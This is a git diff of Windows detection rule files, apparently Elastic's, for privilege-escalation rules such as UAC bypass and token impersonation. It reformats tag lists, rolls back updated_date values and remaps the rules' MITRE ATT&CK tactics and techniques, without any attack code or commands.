-[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml index 0b8fc7248da..e4d788cb975 100644 --- a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml +++ b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/25" [rule] author = ["Elastic"] @@ -20,7 +20,16 @@ references = ["https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-gro risk_score = 47 rule_id = "8f3e91c7-d791-4704-80a1-42c160d7aa27" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -74,12 +83,10 @@ Port monitors and print processors are integral to Windows printing, managing da [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.010" name = "Port Monitors" @@ -90,19 +97,18 @@ id = "T1547.012" name = "Print Processors" reference = "https://attack.mitre.org/techniques/T1547/012/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.010" name = "Port Monitors" @@ -113,7 +119,9 @@ id = "T1547.012" name = "Print Processors" reference = "https://attack.mitre.org/techniques/T1547/012/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_posh_token_impersonation.toml b/rules/windows/privilege_escalation_posh_token_impersonation.toml index 1faa3f340cd..0d2a820a60c 100644 --- a/rules/windows/privilege_escalation_posh_token_impersonation.toml +++ b/rules/windows/privilege_escalation_posh_token_impersonation.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/17" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -111,7 +111,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -155,49 +162,44 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" - [[rule.threat.technique.subtechnique]] id = "T1134.001" name = "Token Impersonation/Theft" reference = "https://attack.mitre.org/techniques/T1134/001/" -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml index d80c2c3760f..75067c258a1 100644 --- a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml +++ b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/06" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -66,7 +66,19 @@ references = ["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34 risk_score = 47 rule_id = "c4818812-d44f-47be-aaef-4cfb2f9cc799" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -79,18 +91,14 @@ file where host.os.type == "windows" and event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique.subtechnique]] -id = "T1070.004" -name = "File Deletion" -reference = "https://attack.mitre.org/techniques/T1070/004/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml index c9ab8872997..c415ada0e36 100644 --- a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml +++ b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/05" integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/07" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ references = ["https://cube0x0.github.io/Pocing-Beyond-DA/"] risk_score = 47 rule_id = "b66b7e2b-d50a-49b9-a6fc-3a383baedc6b" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Crowdstrike", "Resources: Investigation Guide", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Elastic Endgame", +] timestamp_override = "event.ingested" type = "eql" @@ -122,56 +135,46 @@ registry where host.os.type == "windows" and event.type == "change" and process. [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.011" name = "Services Registry Permissions Weakness" reference = "https://attack.mitre.org/techniques/T1574/011/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" [[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.011" -name = "Services Registry Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml index 558c245bdf1..e411a855b25 100644 --- a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml +++ b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/26" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -92,13 +92,19 @@ registry.path : ( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml index 72e4b92d865..2f73a8e24e7 100644 --- a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml +++ b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/12" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -60,7 +60,18 @@ references = [ risk_score = 73 rule_id = "bdcf646b-08d4-492c-870a-6c04e3700034" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Vulnerability", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Use Case: Vulnerability", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -73,13 +84,36 @@ iam where host.os.type == "windows" and event.action == "renamed-user-account" a [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml index 71c3a72deec..c2d36fb1b78 100644 --- a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml +++ b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "system", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -88,7 +88,20 @@ references = ["https://www.elastic.co/security-labs/invisible-miners-unveiling-g risk_score = 21 rule_id = "e8571d5f-bea1-46c2-9f56-998de2d3ed95" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -107,54 +120,73 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" [[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" [[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml index e3e21e88119..db144eec549 100644 --- a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml +++ b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -87,13 +87,24 @@ iam where host.os.type == "windows" and event.action == "changed-computer-accoun [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_takeover_new_source_ip.toml b/rules/windows/privilege_escalation_takeover_new_source_ip.toml index e072fc82581..dc2dae8d80a 100644 --- a/rules/windows/privilege_escalation_takeover_new_source_ip.toml +++ b/rules/windows/privilege_escalation_takeover_new_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/25" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -43,7 +43,14 @@ references = ["https://attack.mitre.org/techniques/T1078/"] risk_score = 47 rule_id = "a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -69,26 +76,14 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml b/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml index 72e8665edce..2e44d0cbfe5 100644 --- a/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml +++ b/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/25" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -79,3 +79,16 @@ winlog.event_data.AccessMask:"512" and not winlog.event_data.SubjectUserSid:("S- ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml index 09fe973b8d6..1ca881499f0 100644 --- a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml +++ b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/20" integration = ["windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/01" [rule] author = ["Elastic"] @@ -75,7 +75,14 @@ Token Right Adjusted Events (Success) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -113,26 +120,14 @@ any where host.os.type == "windows" and event.provider: "Microsoft-Windows-Secur [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml index 4d2045a1f8c..4f92ccdc7c3 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -88,54 +88,53 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" - [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml index 3120f529e85..97b2898d655 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -62,7 +62,20 @@ references = ["https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comaut risk_score = 47 rule_id = "fc7c0fa4-8f03-4b3e-8336-c5feab0be022" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -78,36 +91,53 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" 